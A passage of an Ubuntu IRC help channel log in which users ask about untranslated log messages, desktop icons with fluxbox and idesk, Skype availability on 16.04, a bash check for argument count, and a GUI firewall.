wewlad, they generally spit out short brief 'IN=00D7BA' type logs; to make them language specific would increased code size by heaps, slow down execution etc... it'd be a waste of resources [23:07] wewlad: it depends if the code is written to use the translation functionality, and where the PO files for translation are available in the locale's language [23:08] being consistent regardless of language also makes it easier to make scripts/codes to examine logs as they know what text to search for... (the same regarldess of language used) [23:08] do you guys have any prooflinks? I failed to find any [23:08] i am running fluxbox, lightdm and docky on ubuntu server. i have installed idesk and want it to show the icons for files in a "desktop" folder. is there an easy way to do this? or should i use a different program to idesk for this task? [23:09] i basically want the desktop icons to work the same way as windows, dragging things from my file manager to the desktop and such [23:14] digby: that's generally the realm of a desktop environment [23:16] Hey fellas. Does anybody use pciepassthrogh to game with ubuntu? === ubuntu is now known as Guest66370 [23:32] Was Skype removed from 16.04? [23:35] guzzlefry, you need to download it from skype.com [23:35] I think skype is in canonical partners repo [23:35] It doesn't appear to be in that repo. [23:35] agio, even if it is, it's a very old version that does not work/connect to skype network anymore [23:36] hi [23:36] kostkon: ah, ok makes sense [23:36] This looks like an Electron app... [23:37] if i want to check if the given arguments to the script are more than 2 can i use [ $# -gt 2 ] [23:37] guzzlefry, microsoft's way of making it multiplatform [23:38] welp, can't wait to install another messaging app that eats up a gig of RAM... :P [23:38] 1GB ?! that sucks [23:39] guzzlefry, in the 200-300mb range more like [23:39] #bash [23:39] Guest34818, if [[ $# -gt 2 ]]; then OR if test "$#" -gt 2; then [23:40] oh, that's reasonable. the Slack app is a memory hog. [23:40] oops Guest34818 double quote the $# in the first example, my bad [23:41] [ "$#" -gt 2 ] && echo "error" >&2 [23:42] will it bring bug if the first argument is a path [23:43] that I don't know...not much of a scripter myself. [23:43] Guest34818, you can ask in #bash though [23:45] ok thankyou [23:45] :) === Euph0ria is now known as FutureShock [23:59] Does anyone know if there is a good firewall app for ubuntu, that has a good GUI and can block/allow individual apps as well as ports, IPs, protocols, etc? I've been used to using Comodo Firewall on Windows which very user friendly, and hoping to find something (even remotely) like it.